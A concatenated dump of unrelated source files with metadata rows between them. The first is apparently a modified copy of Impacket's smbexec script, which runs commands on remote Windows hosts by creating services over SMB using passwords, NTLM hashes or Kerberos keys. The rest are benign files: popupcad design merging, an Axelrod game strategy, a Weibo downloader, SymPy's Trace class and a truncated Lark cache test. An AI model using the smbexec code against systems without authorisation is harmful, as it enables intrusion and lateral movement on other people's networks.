# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# A similar approach to psexec w/o using RemComSvc. The technique is described here
# http://www.accuvant.com/blog/owning-computers-without-shell-access
# Our implementation goes one step further, instantiating a local smbserver to receive the
# output of the commands. This is useful in the situation where the target machine does NOT
# have a writeable share available.
# Keep in mind that, although this technique might help avoiding AVs, there are a lot of
# event logs generated and you can't expect executing tasks that will last long since Windows
# will kill the process since it's not responding as a Windows service.
# Certainly not a stealthy way.
#
# This script works in two ways:
# 1) share mode: you specify a share, and everything is done through that share.
# 2) server mode: if for any reason there's no share available, this script will launch a local
# SMB server, so the output of the commands executed are sent back by the target machine
# into a locally shared folder. Keep in mind you would need root access to bind to port 445
# in the local machine.
#
# Author:
# beto (@agsolino)
#
# Reference for:
# DCE/RPC and SMB.
import sys
import os
import cmd
import argparse
import ConfigParser
import logging
from threading import Thread
from impacket.examples import logger
from impacket import version, smbserver
from impacket.smbconnection import *
from impacket.dcerpc.v5 import transport, scmr
OUTPUT_FILENAME = '__output'
BATCH_FILENAME = 'execute.bat'
SMBSERVER_DIR = '__tmp'
DUMMY_SHARE = 'TMP'
results=''
class SMBServer(Thread):
    """Background thread running a throwaway local SMB server (Python 2).

    Exposes one writable dummy share backed by SMBSERVER_DIR so the target
    machine can copy command output back to us when no writable remote
    share is available (server mode). Requires binding port 445 (root).
    """
    def __init__(self):
        Thread.__init__(self)
        self.smb = None
    def cleanup_server(self):
        # Best-effort removal of the log file, then the temporary share dir.
        logging.info('Cleaning up..')
        try:
            os.unlink(SMBSERVER_DIR + '/smb.log')
        except:
            pass
        os.rmdir(SMBSERVER_DIR)
    def run(self):
        # Here we write a mini config for the server (in memory, not on disk)
        smbConfig = ConfigParser.ConfigParser()
        smbConfig.add_section('global')
        smbConfig.set('global','server_name','server_name')
        smbConfig.set('global','server_os','UNIX')
        smbConfig.set('global','server_domain','WORKGROUP')
        smbConfig.set('global','log_file',SMBSERVER_DIR + '/smb.log')
        smbConfig.set('global','credentials_file','')
        # Let's add a dummy share where the target copies its output
        smbConfig.add_section(DUMMY_SHARE)
        smbConfig.set(DUMMY_SHARE,'comment','')
        smbConfig.set(DUMMY_SHARE,'read only','no')
        smbConfig.set(DUMMY_SHARE,'share type','0')
        smbConfig.set(DUMMY_SHARE,'path',SMBSERVER_DIR)
        # IPC always needed
        smbConfig.add_section('IPC$')
        smbConfig.set('IPC$','comment','')
        smbConfig.set('IPC$','read only','yes')
        smbConfig.set('IPC$','share type','3')
        # NOTE(review): no value argument — relies on Python 2 ConfigParser's
        # set(..., value=None) default; would raise under Python 3.
        smbConfig.set('IPC$','path')
        self.smb = smbserver.SMBSERVER(('0.0.0.0',445), config_parser = smbConfig)
        logging.info('Creating tmp directory')
        try:
            os.mkdir(SMBSERVER_DIR)
        except Exception, e:
            # Directory may already exist; log and continue either way.
            logging.critical(str(e))
            pass
        logging.info('Setting up SMB Server')
        self.smb.processConfigFile()
        logging.info('Ready to listen...')
        try:
            self.smb.serve_forever()
        except:
            pass
    def stop(self):
        # Tear down share dir/log, close the socket, then force-stop the
        # thread (py2-only private API).
        self.cleanup_server()
        self.smb.socket.close()
        self.smb.server_close()
        self._Thread__stop()
class CMDEXEC:
    """Drives remote command execution over SMB / SVCCTL (Python 2).

    In SERVER mode a local SMBServer thread is started to receive output;
    in SHARE mode the target writes its output to an existing remote share.
    """
    def __init__(self, username='', password='', domain='', hashes=None, aesKey=None,
                 doKerberos=None, kdcHost=None, mode=None, share=None, port=445, command=None):
        self.__command = command
        self.__username = username
        self.__password = password
        self.__port = port
        # Name of the throwaway Windows service used to run each command.
        self.__serviceName = 'BTOBTO1'
        self.__domain = domain
        self.__lmhash = ''
        self.__nthash = ''
        self.__aesKey = aesKey
        self.__doKerberos = doKerberos
        self.__kdcHost = kdcHost
        self.__share = share
        self.__mode = mode
        self.shell = None
        if hashes is not None:
            self.__lmhash, self.__nthash = hashes.split(':')
    def getOutput(self):
        # Results are published through the module-level `results` global,
        # which RemoteShell.__init__ sets after the command has run.
        return results
    def run(self, remoteName, remoteHost):
        """Open the SVCCTL named pipe on the target and run the command."""
        stringbinding = 'ncacn_np:%s[\pipe\svcctl]' % remoteName
        logging.debug('StringBinding %s'%stringbinding)
        rpctransport = transport.DCERPCTransportFactory(stringbinding)
        rpctransport.set_dport(self.__port)
        rpctransport.setRemoteHost(remoteHost)
        if hasattr(rpctransport,'preferred_dialect'):
            rpctransport.preferred_dialect(SMB_DIALECT)
        if hasattr(rpctransport, 'set_credentials'):
            # This method exists only for selected protocol sequences.
            rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash,
                                         self.__nthash, self.__aesKey)
        rpctransport.set_kerberos(self.__doKerberos, self.__kdcHost)
        self.shell = None
        try:
            if self.__mode == 'SERVER':
                # Spin up the local SMB server to catch the output copy-back.
                serverThread = SMBServer()
                serverThread.daemon = True
                serverThread.start()
            self.shell = RemoteShell(self.__share, rpctransport, self.__mode, self.__serviceName, self.__command)
            #self.shell.cmdloop()
            if self.__mode == 'SERVER':
                serverThread.stop()
        except (Exception, KeyboardInterrupt), e:
            #import traceback
            #traceback.print_exc()
            logging.critical(str(e))
        if self.shell is not None:
            self.shell.finish()
        sys.stdout.flush()
        print "exit"
        #sys.exit(1)
class RemoteShell(cmd.Cmd):
    """Semi-interactive remote shell over SVCCTL (Python 2).

    Each command is wrapped in a batch file that redirects output to
    ``self.__output``; the batch file is run by creating and starting a
    short-lived Windows service, then the output file is fetched back
    (directly from the share, or via copy-back to our local SMB server).
    """
    def __init__(self, share, rpc, mode, serviceName, command):
        cmd.Cmd.__init__(self)
        self.__share = share
        self.__mode = mode
        # Path (as seen from the target) where command output is redirected.
        self.__output = '\\\\127.0.0.1\\' + self.__share + '\\' + OUTPUT_FILENAME
        self.__batchFile = '%TEMP%\\' + BATCH_FILENAME
        self.__outputBuffer = ''
        self.__command = command
        self.__shell = '%COMSPEC% /Q /c '
        self.__serviceName = serviceName
        self.__rpc = rpc
        self.intro = '[!] Launching semi-interactive shell - Careful what you execute'
        self.__scmr = rpc.get_dce_rpc()
        try:
            self.__scmr.connect()
        except Exception, e:
            print "exit1"
            logging.critical(str(e))
            sys.exit(1)
        s = rpc.get_smb_connection()
        # We don't wanna deal with timeouts from now on.
        s.setTimeout(100000)
        if mode == 'SERVER':
            # Build the copy-back command pointing at our local SMB server.
            myIPaddr = s.getSMBServer().get_socket().getsockname()[0]
            self.__copyBack = 'copy %s \\\\%s\\%s' % (self.__output, myIPaddr, DUMMY_SHARE)
        self.__scmr.bind(scmr.MSRPC_UUID_SCMR)
        resp = scmr.hROpenSCManagerW(self.__scmr)
        self.__scHandle = resp['lpScHandle']
        self.transferClient = rpc.get_smb_connection()
        # Run the single requested command and publish its output globally.
        self.do_cd('')
        self.execute_remote(command)
        global results
        results = self.__outputBuffer
        print self.__outputBuffer
    def finish(self):
        # Just in case the service is still created
        try:
            self.__scmr = self.__rpc.get_dce_rpc()
            self.__scmr.connect()
            self.__scmr.bind(scmr.MSRPC_UUID_SCMR)
            resp = scmr.hROpenSCManagerW(self.__scmr)
            self.__scHandle = resp['lpScHandle']
            resp = scmr.hROpenServiceW(self.__scmr, self.__scHandle, self.__serviceName)
            service = resp['lpServiceHandle']
            scmr.hRDeleteService(self.__scmr, service)
            scmr.hRControlService(self.__scmr, service, scmr.SERVICE_CONTROL_STOP)
            scmr.hRCloseServiceHandle(self.__scmr, service)
        except:
            pass
    def do_shell(self, s):
        # Escape hatch: run a command on the LOCAL machine.
        os.system(s)
    def do_exit(self, s):
        return True
    def emptyline(self):
        return False
    def do_cd(self, s):
        # We just can't CD or maintain track of the target dir.
        if len(s) > 0:
            logging.error("You can't CD under SMBEXEC. Use full paths.")
        self.execute_remote('cd ' )
        if len(self.__outputBuffer) > 0:
            # Stripping CR/LF so the cwd becomes the prompt.
            self.prompt = string.replace(self.__outputBuffer,'\r\n','') + '>'
            self.__outputBuffer = ''
    def do_CD(self, s):
        return self.do_cd(s)
    def default(self, line):
        if line != '':
            self.send_data(line)
    def get_output(self):
        """Fetch the remote output file into __outputBuffer and delete it."""
        def output_callback(data):
            self.__outputBuffer += data
        if self.__mode == 'SHARE':
            self.transferClient.getFile(self.__share, OUTPUT_FILENAME, output_callback)
            self.transferClient.deleteFile(self.__share, OUTPUT_FILENAME)
        else:
            # SERVER mode: the target copied the file into our local share dir.
            fd = open(SMBSERVER_DIR + '/' + OUTPUT_FILENAME,'r')
            output_callback(fd.read())
            fd.close()
            os.unlink(SMBSERVER_DIR + '/' + OUTPUT_FILENAME)
    def execute_remote(self, data):
        """Run *data* on the target via a one-shot service, then collect output."""
        # Write a batch file that runs the command with output redirected,
        # run it, (in SERVER mode) copy the output back, and delete the batch.
        command = self.__shell + 'echo ' + data + ' ^> ' + self.__output + ' 2^>^&1 > ' + self.__batchFile + ' & ' + \
                  self.__shell + self.__batchFile
        if self.__mode == 'SERVER':
            command += ' & ' + self.__copyBack
        command += ' & ' + 'del ' + self.__batchFile
        logging.debug('Executing %s' % command)
        resp = scmr.hRCreateServiceW(self.__scmr, self.__scHandle, self.__serviceName, self.__serviceName,
                                     lpBinaryPathName=command, dwStartType=scmr.SERVICE_DEMAND_START)
        service = resp['lpServiceHandle']
        try:
            # Start is expected to "fail" (the binary is not a real service).
            scmr.hRStartServiceW(self.__scmr, service)
        except:
            pass
        scmr.hRDeleteService(self.__scmr, service)
        scmr.hRCloseServiceHandle(self.__scmr, service)
        self.get_output()
    def send_data(self, data):
        self.execute_remote(data)
        print self.__outputBuffer
        self.__outputBuffer = ''
# Process command-line arguments.
if __name__ == '__main__':
    # Init the example's logger theme
    logger.init()
    print version.BANNER
    parser = argparse.ArgumentParser()
    parser.add_argument('target', action='store', help='[[domain/]username[:password]@]<targetName or address>')
    parser.add_argument('-share', action='store', default = 'C$', help='share where the output will be grabbed from '
                        '(default C$)')
    parser.add_argument('-mode', action='store', choices = {'SERVER','SHARE'}, default='SHARE',
                        help='mode to use (default SHARE, SERVER needs root!)')
    parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
    group = parser.add_argument_group('connection')
    group.add_argument('-dc-ip', action='store',metavar = "ip address", help='IP Address of the domain controller. '
                       'If ommited it use the domain part (FQDN) specified in the target parameter')
    group.add_argument('-target-ip', action='store', metavar="ip address", help='IP Address of the target machine. If '
                       'ommited it will use whatever was specified as target. This is useful when target is the NetBIOS '
                       'name and you cannot resolve it')
    group.add_argument('-port', choices=['139', '445'], nargs='?', default='445', metavar="destination port",
                       help='Destination port to connect to SMB Server')
    group = parser.add_argument_group('authentication')
    group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
    group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
    group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
                       '(KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the '
                       'ones specified in the command line')
    group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication '
                       '(128 or 256 bits)')
    if len(sys.argv)==1:
        parser.print_help()
        sys.exit(1)
    options = parser.parse_args()
    if options.debug is True:
        logging.getLogger().setLevel(logging.DEBUG)
    else:
        logging.getLogger().setLevel(logging.INFO)
    import re
    # Split the target spec into [[domain/]username[:password]@]host pieces.
    domain, username, password, remoteName = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(options.target).groups('')
    #In case the password contains '@'
    if '@' in remoteName:
        password = password + '@' + remoteName.rpartition('@')[0]
        remoteName = remoteName.rpartition('@')[2]
    if domain is None:
        domain = ''
    if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:
        from getpass import getpass
        password = getpass("Password:")
    if options.target_ip is None:
        options.target_ip = remoteName
    if options.aesKey is not None:
        # Specifying an AES key implies Kerberos authentication.
        options.k = True
    try:
        # NOTE(review): the command is hard-coded here rather than taken from
        # the command line — confirm this is intentional for this fork.
        command='ipconfig /all'
        executer = CMDEXEC(username, password, domain, options.hashes, options.aesKey, options.k,
                           options.dc_ip, options.mode, options.share, int(options.port), command)
        executer.run(remoteName, options.target_ip)
    except Exception, e:
        logging.critical(str(e))
    sys.exit(0)
| 38.593923
| 138
| 0.621001
|
4a07d5a9e65e5c19a47a1d4edee2d5658d8cf8d7
| 3,951
|
py
|
Python
|
api_examples/design_advanced_functions.py
|
popupcad/popupcad
|
d3da448260cd5cb9e05417b0a723d7f73ae4e06e
|
[
"MIT"
] | 19
|
2015-08-01T22:13:39.000Z
|
2020-03-07T03:55:46.000Z
|
api_examples/design_advanced_functions.py
|
CadQuery/popupcad
|
b0c7b406d4b288c7cb375340323bba0252aedbfb
|
[
"MIT"
] | 106
|
2015-07-23T19:58:01.000Z
|
2019-05-14T03:46:08.000Z
|
api_examples/design_advanced_functions.py
|
CadQuery/popupcad
|
b0c7b406d4b288c7cb375340323bba0252aedbfb
|
[
"MIT"
] | 9
|
2015-10-04T23:38:41.000Z
|
2020-07-16T03:50:34.000Z
|
# -*- coding: utf-8 -*-
"""
Written by Daniel M. Aukes and CONTRIBUTORS
Email: danaukes<at>asu.edu.
Please see LICENSE for full license.
"""
def remap_subdesign_ids(design):
    """Duplicate every subdesign under a fresh id and update the design's
    references to point at the duplicates.

    Returns a list of (old_id, new_id) pairs.
    """
    originals = design.subdesigns.copy()
    duplicates = {}
    id_pairs = []
    for old_id, sub in originals.items():
        # copy(identical=False) yields a duplicate carrying a brand-new id.
        dup = sub.copy(identical = False)
        duplicates[dup.id] = dup
        id_pairs.append((old_id, dup.id))
    for stale, fresh in id_pairs:
        design.replace_subdesign_refs(stale, fresh)
    design.subdesigns = duplicates
    return id_pairs
def remap_sketch_ids(design):
    """Give every sketch in *design* a fresh id and rewrite references to it.

    Returns a list of (old_id, new_id) pairs.
    """
    originals = design.sketches.copy()
    remapped = {}
    id_pairs = []
    for old_id, sketch in originals.items():
        # Non-identical copy allocates a new id for the duplicate sketch.
        duplicate = sketch.copy(identical = False)
        remapped[duplicate.id] = duplicate
        id_pairs.append((old_id, duplicate.id))
    for stale, fresh in id_pairs:
        design.replace_sketch_refs_force(stale, fresh)
    design.sketches = remapped
    return id_pairs
def strip_locates(design):
    """Remove every locate-style operation (anything exposing a
    ``locationgeometry`` attribute) from *design*.

    Iterates indices in descending order so earlier positions stay valid
    while ``pop_operation`` removes entries.
    """
    for index in reversed(range(len(design.operations))):
        if hasattr(design.operations[index], 'locationgeometry'):
            design.pop_operation(index)
def remap_operation_ids(design):
    """Replace each operation with a copy carrying a fresh id, then rewrite
    internal references from the old ids to the new ones.

    Returns a list of (old_op, new_op) object pairs.
    """
    pairs = []
    fresh_ops = []
    for original in design.operations:
        duplicate = original.copy_wrapper()
        # Use the CPython object identity as the new unique id.
        duplicate.id = id(duplicate)
        fresh_ops.append(duplicate)
        pairs.append((original, duplicate))
    design.operations = fresh_ops
    for stale_id, fresh_id in ((old.id, new.id) for old, new in pairs):
        design.replace_op_refs2(stale_id, fresh_id)
    return pairs
def switch_layer_defs(design, layerdef_new):
    """Rebuild, in place, each operation that supports layer-definition
    switching so it refers to *layerdef_new* instead of the design's
    current layer definition."""
    for position, operation in enumerate(design.operations):
        if hasattr(operation, 'switch_layer_defs'):
            design.operations[position] = operation.switch_layer_defs(
                design.return_layer_definition(), layerdef_new)
def external_to_internal_transform_outer(design,subdesign,sketch_mapping,op_mapping):
    """Convert each TransformExternal op in *design* that links to *subdesign*
    into its internal-transform equivalent, then rewrite references to the
    replaced operation ids.

    ``sketch_mapping`` is a list of (old_id, new_id) pairs; ``op_mapping`` is
    a list of (old_op, new_op) object pairs, as produced by the remap helpers.
    """
    op_mapping2 = []
    from popupcad.manufacturing.transform_external import TransformExternal
    sketch_mapping_dict = dict(sketch_mapping)
    op_mapping_dict = dict([(item1.id,item2.id) for item1,item2 in op_mapping])
    for ii,op in enumerate(design.operations):
        if isinstance(op, TransformExternal):
            # Only convert transforms that point at this particular subdesign.
            if op.design_links['subdesign'][0] == subdesign.id:
                new = op.to_internal_transform(sketch_mapping_dict,op_mapping_dict)
                design.operations[ii]=new
                op_mapping2.append((op.id,new.id))
    # Fix up anything referencing the operations replaced above.
    for oldref,newref in op_mapping2:
        design.replace_op_refs2(oldref,newref)
def remap_sub(subdesign, debug=False, debug_path='C:/Users/danaukes/desktop/test.cad'):
    """Reassign fresh ids to a subdesign's subdesigns, sketches and
    operations, remapping all internal references, and strip locate ops.

    Parameters
    ----------
    subdesign : design object to remap; mutated in place.
    debug : when True, snapshot the remapped subdesign to ``debug_path``.
        Previously this was hard-coded to True with a developer-specific
        Windows path, which crashed on any other machine; it now defaults
        to off and the old path is kept only as the default for callers
        who opt in.
    debug_path : destination for the debug snapshot when ``debug`` is True.

    Returns
    -------
    (subdesign_mapping, sketch_mapping, op_mapping) — the id-mapping lists
    produced by the remap helpers.
    """
    subdesign_mapping = remap_subdesign_ids(subdesign)
    sketch_mapping = remap_sketch_ids(subdesign)
    # Locate operations are machine/session specific; drop them before reuse.
    strip_locates(subdesign)
    op_mapping = remap_operation_ids(subdesign)
    if debug:
        subdesign.save_yaml(debug_path)
    return subdesign_mapping, sketch_mapping, op_mapping
def merge_designs(design, subdesign, index, debug=False):
    """Splice *subdesign* into *design* at operation position *index*.

    Remaps the subdesign's ids (via remap_sub), merges its subdesigns and
    sketches into *design*, rewrites the subdesign's operations to use the
    parent's layer definition, and inserts its operations at *index*.

    Parameters
    ----------
    design : parent design; mutated in place.
    subdesign : design to merge; mutated in place by the remap step.
    index : position in ``design.operations`` where the subdesign's
        operations are inserted.
    debug : when True, write intermediate snapshots to the developer's
        desktop (previously this was hard-coded to always-on, which crashed
        on machines without that path; it now defaults to off).

    Returns
    -------
    (subdesign_mapping, sketch_mapping, op_mapping) from remap_sub.
    """
    subdesign_mapping, sketch_mapping, op_mapping = remap_sub(subdesign)
    design.subdesigns.update(subdesign.subdesigns)
    design.sketches.update(subdesign.sketches)
    if debug:
        design.save_yaml('C:/Users/danaukes/desktop/test2.cad')
    # Make the subdesign's operations speak the parent's layer definition.
    switch_layer_defs(subdesign, design.return_layer_definition())
    if debug:
        subdesign.save_yaml('C:/Users/danaukes/desktop/test3.cad')
    design.operations = design.operations[:index] + subdesign.operations + design.operations[index:]
    if debug:
        design.save_yaml('C:/Users/danaukes/desktop/test4.cad')
    return subdesign_mapping, sketch_mapping, op_mapping
| 34.657895
| 101
| 0.704126
|
4a07d5dbfe208f07693094b74dc340bb2cd5b2c3
| 1,114
|
py
|
Python
|
axelrod/strategies/gradualkiller.py
|
t0nyt93/Axelroddd
|
66d95378d3ece8b32afeb1c77d305397bd9a815e
|
[
"MIT"
] | null | null | null |
axelrod/strategies/gradualkiller.py
|
t0nyt93/Axelroddd
|
66d95378d3ece8b32afeb1c77d305397bd9a815e
|
[
"MIT"
] | null | null | null |
axelrod/strategies/gradualkiller.py
|
t0nyt93/Axelroddd
|
66d95378d3ece8b32afeb1c77d305397bd9a815e
|
[
"MIT"
] | 1
|
2019-03-11T08:56:09.000Z
|
2019-03-11T08:56:09.000Z
|
from axelrod.actions import Actions
from axelrod.player import Player
from axelrod.strategy_transformers import InitialTransformer
from axelrod.actions import Action
C, D = Actions.C, Actions.D
@InitialTransformer((D, D, D, D, D, C, C), name_prefix=None)
class GradualKiller(Player):
    """
    Defects on the first five moves, then cooperates twice (both handled by
    the InitialTransformer above). From move eight onward it defects forever
    if the opponent defected on both moves six and seven, otherwise it
    cooperates forever.

    Initially designed to stop Gradual from defeating TitForTat in a 3 Player
    tournament.

    Names

    - Gradual Killer: [PRISON1998]_
    """

    # These are various properties for the strategy
    name = 'Gradual Killer'
    classifier = {
        'memory_depth': float('Inf'),
        'stochastic': False,
        'makes_use_of': set(),
        'long_run_time': False,
        'inspects_source': False,
        'manipulates_source': False,
        'manipulates_state': False
    }

    def strategy(self, opponent: Player) -> Action:
        # The transformer already played D,D,D,D,D,C,C; punish permanently
        # only if the opponent defected on both probe responses (moves 6, 7).
        return D if opponent.history[5:7] == [D, D] else C
| 28.564103
| 78
| 0.664273
|
4a07d67bbb8d22e391a3fae7fcdd93ebc3f35549
| 2,209
|
py
|
Python
|
doc/test/test-data-provider/weibo_spider/downloader/downloader.py
|
baijunhan/data-flow
|
7cba999c49dd38a4d4afe9f9076cda80b3c6ea7c
|
[
"Apache-2.0"
] | 6
|
2021-01-25T17:36:17.000Z
|
2021-05-18T12:14:02.000Z
|
doc/test/test-data-provider/weibo_spider/downloader/downloader.py
|
baijunhan/data-flow
|
7cba999c49dd38a4d4afe9f9076cda80b3c6ea7c
|
[
"Apache-2.0"
] | 6
|
2021-08-31T21:49:48.000Z
|
2022-03-02T10:13:08.000Z
|
doc/test/test-data-provider/weibo_spider/downloader/downloader.py
|
baijunhan/data-flow
|
7cba999c49dd38a4d4afe9f9076cda80b3c6ea7c
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: UTF-8 -*-
import logging
import os
import sys
from abc import ABC, abstractmethod
import requests
from requests.adapters import HTTPAdapter
from tqdm import tqdm
logger = logging.getLogger('spider.downloader')
class Downloader(ABC):
    """Base class for weibo file (image/video) downloaders.

    Subclasses implement handle_download() to map a weibo's URLs to files;
    this class provides the shared single-file and batch download machinery.
    """
    def __init__(self, file_dir, file_download_timeout):
        # Directory where downloaded files (and the failure log) are stored.
        self.file_dir = file_dir
        # Human-readable description and the weibo attribute holding the URLs;
        # subclasses are expected to fill these in.
        self.describe = ''
        self.key = ''
        # [max_retries, connect_timeout, read_timeout]; defaults below are kept
        # unless the caller supplies a 3-element list of positive numbers.
        self.file_download_timeout = [5, 5, 10]
        if (isinstance(file_download_timeout, list)
                and len(file_download_timeout) == 3):
            for i in range(3):
                v = file_download_timeout[i]
                if isinstance(v, (int, float)) and v > 0:
                    self.file_download_timeout[i] = v
    @abstractmethod
    def handle_download(self, urls, w):
        """Download the image/video files pointed to by *urls*, using the
        information in weibo record *w* to build the file names."""
        pass
    def download_one_file(self, url, file_path, weibo_id):
        """Download a single file (image/video); on failure, append the URL
        to not_downloaded.txt instead of raising."""
        try:
            if not os.path.isfile(file_path):
                s = requests.Session()
                # NOTE(review): the retry count reuses file_download_timeout[0];
                # the remaining two entries are the connect/read timeouts.
                s.mount(url,
                        HTTPAdapter(max_retries=self.file_download_timeout[0]))
                downloaded = s.get(url,
                                   timeout=(self.file_download_timeout[1],
                                            self.file_download_timeout[2]))
                with open(file_path, 'wb') as f:
                    f.write(downloaded.content)
        except Exception as e:
            # Record the failure so it can be retried manually later.
            error_file = self.file_dir + os.sep + 'not_downloaded.txt'
            with open(error_file, 'ab') as f:
                url = weibo_id + ':' + file_path + ':' + url + '\n'
                f.write(url.encode(sys.stdout.encoding))
            logger.exception(e)
    def download_files(self, weibos):
        """Download files (images/videos) for every weibo in *weibos*."""
        try:
            logger.info(u'即将进行%s下载', self.describe)
            for w in tqdm(weibos, desc='Download progress'):
                # The sentinel u'无' ("none") marks weibos without media.
                if getattr(w, self.key) != u'无':
                    self.handle_download(getattr(w, self.key), w)
            logger.info(u'%s下载完毕,保存路径:', self.describe)
            logger.info(self.file_dir)
        except Exception as e:
            logger.exception(e)
| 35.629032
| 79
| 0.550475
|
4a07d6a1f492398096bebfa7adad4fd17ffffb64
| 2,275
|
py
|
Python
|
sympy/matrices/expressions/trace.py
|
JMSS-Unknown/sympy
|
cd98ba006b5c6d6a6d072eafa28ea6d0ebdaf0e7
|
[
"BSD-3-Clause"
] | null | null | null |
sympy/matrices/expressions/trace.py
|
JMSS-Unknown/sympy
|
cd98ba006b5c6d6a6d072eafa28ea6d0ebdaf0e7
|
[
"BSD-3-Clause"
] | null | null | null |
sympy/matrices/expressions/trace.py
|
JMSS-Unknown/sympy
|
cd98ba006b5c6d6a6d072eafa28ea6d0ebdaf0e7
|
[
"BSD-3-Clause"
] | 1
|
2018-10-21T06:32:46.000Z
|
2018-10-21T06:32:46.000Z
|
from __future__ import print_function, division
from sympy import Basic, Expr, sympify
from sympy.matrices.matrices import MatrixBase
from .matexpr import ShapeError
class Trace(Expr):
    """Matrix Trace

    Represents the trace of a matrix expression.

    >>> from sympy import MatrixSymbol, Trace, eye
    >>> A = MatrixSymbol('A', 3, 3)
    >>> Trace(A)
    Trace(A)

    See Also:
        trace
    """
    is_Trace = True

    def __new__(cls, mat):
        # Validate the operand eagerly: Trace only makes sense for square
        # matrix expressions.
        mat = sympify(mat)
        if not mat.is_Matrix:
            raise TypeError("input to Trace, %s, is not a matrix" % str(mat))
        if not mat.is_square:
            raise ShapeError("Trace of a non-square matrix")
        return Basic.__new__(cls, mat)

    def _eval_transpose(self):
        # trace(A) == trace(A.T), so transposition is a no-op.
        return self

    def _eval_derivative(self, v):
        from sympy import Dummy, MatrixExpr, Sum
        if not isinstance(v, MatrixExpr):
            return None
        # Express d(trace(A))/dV as an index summation over the diagonal and
        # let from_index_summation rebuild the matrix form.
        t1 = Dummy("t_1")
        m = Dummy("m")
        n = Dummy("n")
        return MatrixExpr.from_index_summation(
            Sum(self.args[0][t1, t1].diff(v[m, n]), (t1, 0, self.args[0].shape[0]-1)),
            m,
            dimensions=(v.args[1:])
        )

    @property
    def arg(self):
        # The matrix expression whose trace is taken.
        return self.args[0]

    def doit(self, **kwargs):
        if kwargs.get('deep', True):
            arg = self.arg.doit(**kwargs)
            try:
                # Delegate to the argument's own trace evaluation if defined.
                return arg._eval_trace()
            except (AttributeError, NotImplementedError):
                return Trace(arg)
        else:
            # _eval_trace would go too deep here
            if isinstance(self.arg, MatrixBase):
                return trace(self.arg)
            else:
                return Trace(self.arg)

    def _eval_rewrite_as_Sum(self, **kwargs):
        # trace(A) == Sum(A[i, i], (i, 0, rows-1))
        from sympy import Sum, Dummy
        i = Dummy('i')
        return Sum(self.arg[i, i], (i, 0, self.arg.rows-1)).doit()
def trace(expr):
    """ Trace of a Matrix. Sum of the diagonal elements

    >>> from sympy import trace, Symbol, MatrixSymbol, pprint, eye
    >>> n = Symbol('n')
    >>> X = MatrixSymbol('X', n, n)  # A square matrix
    >>> trace(2*X)
    2*Trace(X)
    >>> trace(eye(3))
    3

    See Also:
        Trace
    """
    # Construct the symbolic Trace node and immediately try to evaluate it.
    return Trace(expr).doit()
| 24.728261
| 90
| 0.553407
|
4a07d7a3c10390c181db9ad5c1ab33aed0a28853
| 2,609
|
py
|
Python
|
tests/test_cache.py
|
asellappen/lark
|
da6a4e4d00022452abf59df4b4232480608d4f7d
|
[
"MIT"
] | 1
|
2020-12-04T09:16:33.000Z
|
2020-12-04T09:16:33.000Z
|
tests/test_cache.py
|
asellappen/lark
|
da6a4e4d00022452abf59df4b4232480608d4f7d
|
[
"MIT"
] | null | null | null |
tests/test_cache.py
|
asellappen/lark
|
da6a4e4d00022452abf59df4b4232480608d4f7d
|
[
"MIT"
] | null | null | null |
from __future__ import absolute_import
import sys
from unittest import TestCase, main
from lark import Lark, Tree
from lark.lexer import Lexer, Token
import lark.lark as lark_module
try:
from StringIO import StringIO
except ImportError:
from io import BytesIO as StringIO
import tempfile, os
class MockFile(StringIO):
    """In-memory file whose close() is a no-op, so cached 'files' stay
    readable after the code under test closes them. Also usable as a
    context manager."""

    def close(self):
        # Intentionally do nothing: the buffer must survive reuse.
        return None

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc, tb):
        # Do not suppress exceptions; nothing to clean up.
        return None
class MockFS:
    """Minimal in-memory stand-in for the module's filesystem shim: maps
    names to MockFile buffers and never touches the real disk."""

    def __init__(self):
        # name -> MockFile
        self.files = {}

    def open(self, name, mode=None):
        # Create the buffer on first open; rewind on every open so a cached
        # "file" can be re-read from the start. (A brand-new MockFile is
        # already at position 0, so the unconditional seek is harmless.)
        handle = self.files.setdefault(name, MockFile())
        handle.seek(0)
        return handle

    def exists(self, name):
        return name in self.files
class CustomLexer(Lexer):
    """Minimal Lexer stub: emits every element of the input as an 'A' token.

    Used to verify that the grammar cache is keyed on the custom lexer class.
    """
    def __init__(self, lexer_conf):
        # Configuration is irrelevant for this stub.
        pass
    def lex(self, data):
        # Yield one token per input element, all with terminal name 'A'.
        for obj in data:
            yield Token('A', obj)
class TestCache(TestCase):
    """Exercise Lark's grammar-cache round trip against the in-memory MockFS."""

    def setUp(self):
        pass

    def test_simple(self):
        g = '''start: "a"'''
        fn = "bla"
        # Swap the module-level filesystem shim for the mock so no real files
        # are written; the original is restored in the finally block.
        fs = lark_module.FS
        mock_fs = MockFS()
        try:
            lark_module.FS = mock_fs
            # Explicit cache filename: first build writes, second build loads.
            Lark(g, parser='lalr', cache=fn)
            assert fn in mock_fs.files
            parser = Lark(g, parser='lalr', cache=fn)
            assert parser.parse('a') == Tree('start', [])
            # cache=True derives the filename from the grammar itself.
            mock_fs.files = {}
            assert len(mock_fs.files) == 0
            Lark(g, parser='lalr', cache=True)
            assert len(mock_fs.files) == 1
            parser = Lark(g, parser='lalr', cache=True)
            assert parser.parse('a') == Tree('start', [])
            # A different grammar must get its own cache entry.
            parser = Lark(g+' "b"', parser='lalr', cache=True)
            assert len(mock_fs.files) == 2
            assert parser.parse('ab') == Tree('start', [])
            parser = Lark(g, parser='lalr', cache=True)
            assert parser.parse('a') == Tree('start', [])
            # Test with custom lexer: both builds share one cache entry.
            mock_fs.files = {}
            parser = Lark(g, parser='lalr', lexer=CustomLexer, cache=True)
            parser = Lark(g, parser='lalr', lexer=CustomLexer, cache=True)
            assert len(mock_fs.files) == 1
            assert parser.parse('a') == Tree('start', [])
            # Test options persistence across a cache reload.
            mock_fs.files = {}
            Lark(g, parser="lalr", debug=True, cache=True)
            parser = Lark(g, parser="lalr", debug=True, cache=True)
